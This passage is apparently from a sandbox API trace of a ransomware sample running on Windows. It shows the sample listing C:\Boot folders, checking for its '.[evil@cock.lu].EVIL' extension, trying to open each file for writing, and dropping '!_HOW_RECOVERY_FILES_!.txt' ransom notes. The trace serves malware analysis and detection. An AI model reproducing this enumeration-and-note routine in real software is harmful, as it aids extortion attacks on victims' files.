_Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\et-EE") returned 14 [0077.677] wcscmp (_String1=".", _String2="et-EE") returned -1 [0077.677] wcscmp (_String1="..", _String2="et-EE") returned -1 [0077.677] wcslen (_String="C:\\\\Boot\\et-EE") returned 0xe [0077.677] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Boot\\et-EE" | out: _Destination="C:\\\\Boot\\et-EE") returned 0x0 [0077.677] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Boot\\et-EE\\*") returned="C:\\\\Boot\\et-EE\\*" [0077.677] FindFirstFileW (in: lpFileName="C:\\\\Boot\\et-EE\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0077.677] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.677] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\et-EE\\.") returned 16 [0077.677] wcscmp (_String1=".", _String2=".") returned 0 [0077.677] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.677] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.677] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\et-EE\\..") returned 17 [0077.677] wcscmp (_String1=".", _String2="..") returned -1 [0077.677] wcscmp (_String1="..", _String2="..") returned 0 [0077.677] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.677] wcsstr (_Str="bootmgr.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.677] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\et-EE\\bootmgr.exe.mui") returned 30 [0077.677] wcscmp (_String1="bootmgr.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.677] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootmgr.exe.mui") returned 0x0 [0077.677] wcslen (_String="C:\\\\Boot\\et-EE\\bootmgr.exe.mui") returned 0x1e [0077.677] CreateFileW (lpFileName="C:\\\\Boot\\et-EE\\bootmgr.exe.mui" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0077.677] GetLastError () returned 0x5 [0077.677] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0077.677] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0077.678] wcslen (_String="C:\\\\Boot\\et-EE") returned 0xe [0077.678] strlen (_Str="${KEY}") returned 0x6 [0077.678] memchr (_Buf=0x84b116bf00, _Val=36, _MaxCount=0x391) returned 0x84b116c0e0 [0077.678] memchr (_Buf=0x84b116c0e1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0077.678] strlen (_Str="${CODE}") returned 0x7 [0077.678] memchr (_Buf=0x84b116bf00, _Val=36, _MaxCount=0x390) returned 0x84b116c0e0 [0077.678] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0077.678] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0077.678] _wfsopen (_FileName="C:\\\\Boot\\et-EE\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0077.678] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0077.678] __uncaught_exception () returned 0x84b1160800 [0077.678] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0077.679] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0077.679] wcsstr (_Str="fi-FI", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.679] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\fi-FI") returned 14 [0077.679] wcscmp (_String1=".", _String2="fi-FI") returned -1 [0077.679] wcscmp (_String1="..", _String2="fi-FI") returned -1 [0077.679] wcslen (_String="C:\\\\Boot\\fi-FI") returned 0xe [0077.679] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Boot\\fi-FI" | out: _Destination="C:\\\\Boot\\fi-FI") returned 0x0 [0077.679] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Boot\\fi-FI\\*") returned="C:\\\\Boot\\fi-FI\\*" [0077.679] FindFirstFileW (in: lpFileName="C:\\\\Boot\\fi-FI\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0077.682] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.682] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\fi-FI\\.") returned 16 [0077.682] wcscmp (_String1=".", _String2=".") returned 0 [0077.682] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.682] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.682] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\fi-FI\\..") returned 17 [0077.682] wcscmp (_String1=".", _String2="..") returned -1 [0077.682] wcscmp (_String1="..", _String2="..") returned 0 [0077.682] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.682] wcsstr (_Str="bootmgr.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.682] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui") returned 30 [0077.682] wcscmp (_String1="bootmgr.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.682] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootmgr.exe.mui") returned 0x0 [0077.682] wcslen (_String="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui") returned 0x1e [0077.682] CreateFileW (lpFileName="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0077.683] GetLastError () returned 0x5 [0077.683] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.683] wcsstr (_Str="memtest.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.683] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\fi-FI\\memtest.exe.mui") returned 30 [0077.683] wcscmp (_String1="memtest.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.683] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="memtest.exe.mui") returned 0x0 [0077.683] wcslen (_String="C:\\\\Boot\\fi-FI\\memtest.exe.mui") returned 0x1e [0077.683] CreateFileW (lpFileName="C:\\\\Boot\\fi-FI\\memtest.exe.mui" (normalized: "c:\\boot\\fi-fi\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0077.683] GetLastError () returned 0x5 [0077.683] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0077.683] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0077.683] wcslen (_String="C:\\\\Boot\\fi-FI") returned 0xe [0077.683] strlen (_Str="${KEY}") returned 0x6 [0077.683] memchr (_Buf=0x84b116bf00, _Val=36, _MaxCount=0x391) returned 0x84b116c0e0 [0077.683] memchr (_Buf=0x84b116c0e1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0077.683] strlen (_Str="${CODE}") returned 0x7 [0077.683] memchr (_Buf=0x84b116bf00, _Val=36, _MaxCount=0x390) returned 0x84b116c0e0 [0077.683] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0077.683] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0077.683] _wfsopen (_FileName="C:\\\\Boot\\fi-FI\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0077.725] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0077.725] __uncaught_exception () returned 0x84b1160800 [0077.725] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0077.726] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0077.726] wcsstr (_Str="Fonts", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.726] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\Fonts") returned 14 [0077.726] wcscmp (_String1=".", _String2="Fonts") returned -1 [0077.726] wcscmp (_String1="..", _String2="Fonts") returned -1 [0077.726] wcslen (_String="C:\\\\Boot\\Fonts") returned 0xe [0077.726] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Boot\\Fonts" | out: _Destination="C:\\\\Boot\\Fonts") returned 0x0 [0077.726] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Boot\\Fonts\\*") returned="C:\\\\Boot\\Fonts\\*" [0077.726] FindFirstFileW (in: lpFileName="C:\\\\Boot\\Fonts\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0077.758] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.758] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\Fonts\\.") returned 16 [0077.758] wcscmp (_String1=".", _String2=".") returned 0 [0077.758] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.758] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.758] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\Fonts\\..") returned 17 [0077.758] wcscmp (_String1=".", _String2="..") returned -1 [0077.758] wcscmp (_String1="..", _String2="..") returned 0 [0077.759] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.759] wcsstr (_Str="chs_boot.ttf", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.759] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\Fonts\\chs_boot.ttf") returned 27 [0077.759] wcscmp (_String1="chs_boot.ttf", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.759] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="chs_boot.ttf") returned 0x0 [0077.759] wcslen (_String="C:\\\\Boot\\Fonts\\chs_boot.ttf") returned 0x1b [0077.759] CreateFileW (lpFileName="C:\\\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0077.759] GetLastError () returned 0x5 [0077.759] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.760] wcsstr (_Str="cht_boot.ttf", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.760] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\Fonts\\cht_boot.ttf") returned 27 [0077.760] wcscmp (_String1="cht_boot.ttf", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.760] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="cht_boot.ttf") returned 0x0 [0077.760] wcslen (_String="C:\\\\Boot\\Fonts\\cht_boot.ttf") returned 0x1b [0077.760] CreateFileW (lpFileName="C:\\\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0077.760] GetLastError () returned 0x5 [0077.760] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.760] wcsstr (_Str="jpn_boot.ttf", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.760] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\Fonts\\jpn_boot.ttf") returned 27 [0077.760] wcscmp (_String1="jpn_boot.ttf", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.760] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="jpn_boot.ttf") returned 0x0 [0077.760] wcslen (_String="C:\\\\Boot\\Fonts\\jpn_boot.ttf") returned 0x1b [0077.760] CreateFileW (lpFileName="C:\\\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0077.765] GetLastError () returned 0x5 [0077.765] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.765] wcsstr (_Str="kor_boot.ttf", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.765] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\Fonts\\kor_boot.ttf") returned 27 [0077.765] wcscmp (_String1="kor_boot.ttf", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.765] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="kor_boot.ttf") returned 0x0 [0077.765] wcslen (_String="C:\\\\Boot\\Fonts\\kor_boot.ttf") returned 0x1b [0077.765] CreateFileW (lpFileName="C:\\\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0077.765] GetLastError () returned 0x5 [0077.765] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.765] wcsstr (_Str="malgunn_boot.ttf", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.765] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\Fonts\\malgunn_boot.ttf") returned 31 [0077.765] wcscmp (_String1="malgunn_boot.ttf", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.765] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="malgunn_boot.ttf") returned 0x0 [0077.765] wcslen (_String="C:\\\\Boot\\Fonts\\malgunn_boot.ttf") returned 0x1f [0077.766] CreateFileW (lpFileName="C:\\\\Boot\\Fonts\\malgunn_boot.ttf" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0077.800] GetLastError () returned 0x5 [0077.800] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.800] wcsstr (_Str="malgun_boot.ttf", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.800] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\Fonts\\malgun_boot.ttf") returned 30 [0077.800] wcscmp (_String1="malgun_boot.ttf", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.800] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="malgun_boot.ttf") returned 0x0 [0077.800] wcslen (_String="C:\\\\Boot\\Fonts\\malgun_boot.ttf") returned 0x1e [0077.800] CreateFileW (lpFileName="C:\\\\Boot\\Fonts\\malgun_boot.ttf" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0077.815] GetLastError () returned 0x5 [0077.815] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.816] wcsstr (_Str="meiryon_boot.ttf", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.816] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\Fonts\\meiryon_boot.ttf") returned 31 [0077.816] wcscmp (_String1="meiryon_boot.ttf", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.816] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="meiryon_boot.ttf") returned 0x0 [0077.816] wcslen (_String="C:\\\\Boot\\Fonts\\meiryon_boot.ttf") returned 0x1f [0077.816] CreateFileW (lpFileName="C:\\\\Boot\\Fonts\\meiryon_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0077.816] GetLastError () returned 0x5 [0077.816] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.816] wcsstr (_Str="meiryo_boot.ttf", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.816] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\Fonts\\meiryo_boot.ttf") returned 30 [0077.816] wcscmp (_String1="meiryo_boot.ttf", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.816] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="meiryo_boot.ttf") returned 0x0 [0077.816] wcslen (_String="C:\\\\Boot\\Fonts\\meiryo_boot.ttf") returned 0x1e [0077.816] CreateFileW (lpFileName="C:\\\\Boot\\Fonts\\meiryo_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0077.829] GetLastError () returned 0x5 [0077.829] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.830] wcsstr (_Str="msjhn_boot.ttf", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.830] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\Fonts\\msjhn_boot.ttf") returned 29 [0077.830] wcscmp (_String1="msjhn_boot.ttf", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.830] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msjhn_boot.ttf") returned 0x0 [0077.830] wcslen (_String="C:\\\\Boot\\Fonts\\msjhn_boot.ttf") returned 0x1d [0077.830] CreateFileW (lpFileName="C:\\\\Boot\\Fonts\\msjhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0077.830] GetLastError () returned 0x5 [0077.830] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.830] wcsstr (_Str="msjh_boot.ttf", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.830] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\Fonts\\msjh_boot.ttf") returned 28 [0077.830] wcscmp (_String1="msjh_boot.ttf", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.830] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msjh_boot.ttf") returned 0x0 [0077.830] wcslen (_String="C:\\\\Boot\\Fonts\\msjh_boot.ttf") returned 0x1c [0077.830] CreateFileW (lpFileName="C:\\\\Boot\\Fonts\\msjh_boot.ttf" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0077.830] GetLastError () returned 0x5 [0077.830] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.830] wcsstr (_Str="msyhn_boot.ttf", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.830] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\Fonts\\msyhn_boot.ttf") returned 29 [0077.830] wcscmp (_String1="msyhn_boot.ttf", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.830] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msyhn_boot.ttf") returned 0x0 [0077.830] wcslen (_String="C:\\\\Boot\\Fonts\\msyhn_boot.ttf") returned 0x1d [0077.830] CreateFileW (lpFileName="C:\\\\Boot\\Fonts\\msyhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0077.831] GetLastError () returned 0x5 [0077.831] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.831] wcsstr (_Str="msyh_boot.ttf", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.831] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\Fonts\\msyh_boot.ttf") returned 28 [0077.831] wcscmp (_String1="msyh_boot.ttf", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.831] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msyh_boot.ttf") returned 0x0 [0077.831] wcslen (_String="C:\\\\Boot\\Fonts\\msyh_boot.ttf") returned 0x1c [0077.831] CreateFileW (lpFileName="C:\\\\Boot\\Fonts\\msyh_boot.ttf" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0077.863] GetLastError () returned 0x5 [0077.863] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.863] wcsstr (_Str="segmono_boot.ttf", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.863] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\Fonts\\segmono_boot.ttf") returned 31 [0077.863] wcscmp (_String1="segmono_boot.ttf", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.863] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="segmono_boot.ttf") returned 0x0 [0077.863] wcslen (_String="C:\\\\Boot\\Fonts\\segmono_boot.ttf") returned 0x1f [0077.863] CreateFileW (lpFileName="C:\\\\Boot\\Fonts\\segmono_boot.ttf" (normalized: "c:\\boot\\fonts\\segmono_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0077.864] GetLastError () returned 0x5 [0077.864] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.864] wcsstr (_Str="segoen_slboot.ttf", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.864] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\Fonts\\segoen_slboot.ttf") returned 32 [0077.864] wcscmp (_String1="segoen_slboot.ttf", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.864] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="segoen_slboot.ttf") returned 0x0 [0077.864] wcslen (_String="C:\\\\Boot\\Fonts\\segoen_slboot.ttf") returned 0x20 [0077.864] CreateFileW (lpFileName="C:\\\\Boot\\Fonts\\segoen_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoen_slboot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 